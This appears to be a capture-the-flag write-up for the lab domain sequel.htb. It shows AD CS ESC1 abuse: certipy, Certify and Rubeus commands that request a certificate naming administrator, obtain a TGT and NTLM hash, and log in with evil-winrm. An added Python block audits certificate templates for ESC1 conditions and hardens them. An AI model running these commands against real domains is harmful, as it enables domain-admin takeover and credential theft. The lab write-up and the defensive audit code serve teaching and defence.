Administrator

Exploit without a shell

View vulnerable certificates

certipy find -u ryan.cooper -p passw -target sequel.htb -text -stdout -vulnerable

Forge a new certificate

certipy-ad req -u ryan.cooper -p passw -target sequel.htb -upn administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication

Get the TGT and NTLM hash

certipy-ad auth -pfx administrator.pfx

Exploit via shell on machine

.\Certify.exe find /vulnerable

Enrollment rights on the template are also granted to Domain Users, so any member of that group can enroll in it
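The conditions Certify and certipy flag as ESC1 can also be checked offline from a template's own attributes. The Python below is an added example, not code from this write-up or from Certify/certipy: it scores constructed sample template data against the ESC1 conditions and shows the two settings (clearing the enrollee-supplies-subject flag, requiring manager approval) that close the finding. The attribute names and flag values are the standard AD CS ones; the `enrollment-rights` key is a simplification of the template's security descriptor, and the template contents are invented, not taken from sequel.htb.

```python
# Added example: offline ESC1 audit of certificate-template attributes.
# Attribute names and flag values are the documented AD CS ones; template
# contents and the "enrollment-rights" key are constructed for this example.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval

# EKU OIDs that make the issued certificate usable for Kerberos (PKINIT) logon.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}

# Constructed sample: a template shaped like the one the write-up abuses.
VULNERABLE_TEMPLATE = {
    "name": "UserAuthentication",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
    "enrollment-rights": ["Domain Users", "Domain Admins"],  # simplified ACL
}


def esc1_findings(template):
    """Return the ESC1 conditions this template satisfies, as a list of strings.

    ESC1 needs all five: enrollee-supplied subject, an authentication EKU
    (or an empty EKU list), no manager approval, no RA signatures, and
    enrollment granted to a low-privilege principal."""
    findings = []
    name_flags = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flags = template.get("msPKI-Enrollment-Flag", 0)
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    ra_sigs = template.get("msPKI-RA-Signature", 0)
    enrollers = set(template.get("enrollment-rights", []))

    if name_flags & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject (SAN can name any account)")
    if not ekus or ekus & CLIENT_AUTH_EKUS:
        findings.append("EKU allows client authentication")
    if not enroll_flags & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval required")
    if ra_sigs == 0:
        findings.append("no authorized signatures required")
    low = enrollers & LOW_PRIV_PRINCIPALS
    if low:
        findings.append("enrollment granted to low-privilege principals: " + ", ".join(sorted(low)))
    return findings


def is_esc1(template):
    """True only when every ESC1 condition holds."""
    return len(esc1_findings(template)) == 5


def harden(template):
    """Return a copy with the two settings that break ESC1: the requester may
    no longer choose the subject, and every request waits for CA manager approval."""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] = template.get("msPKI-Certificate-Name-Flag", 0) & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["msPKI-Enrollment-Flag"] = template.get("msPKI-Enrollment-Flag", 0) | CT_FLAG_PEND_ALL_REQUESTS
    return fixed


if __name__ == "__main__":
    for t in (VULNERABLE_TEMPLATE, harden(VULNERABLE_TEMPLATE)):
        print(t["name"], "ESC1:", is_esc1(t))
        for f in esc1_findings(t):
            print("  -", f)
```

Either of the two changes in `harden` alone is enough to stop the template from being ESC1-exploitable; removing Domain Users from the enrollment ACL is the third option when the template genuinely needs supplied subjects.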

We request a certificate as our own user but supply administrator as the alternative name, since the template lets the enrollee choose the subject

.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

If port 5986 (WinRM over HTTPS) is open

Put the private key contents into a key.pem file and the certificate into a key.cert file

evil-winrm -S -c key.cert -k key.pem -i dc.sequel.htb

If port 5986 is closed

Put certificate contents into a cert.pem file and convert to pfx

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Upload Rubeus and newly made cert.pfx

.\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap

The /getcredentials /show /nowrap flags make Rubeus also print the NTLM hash of the user alongside the ticket

We can then log in with either the ticket or the NTLM hash
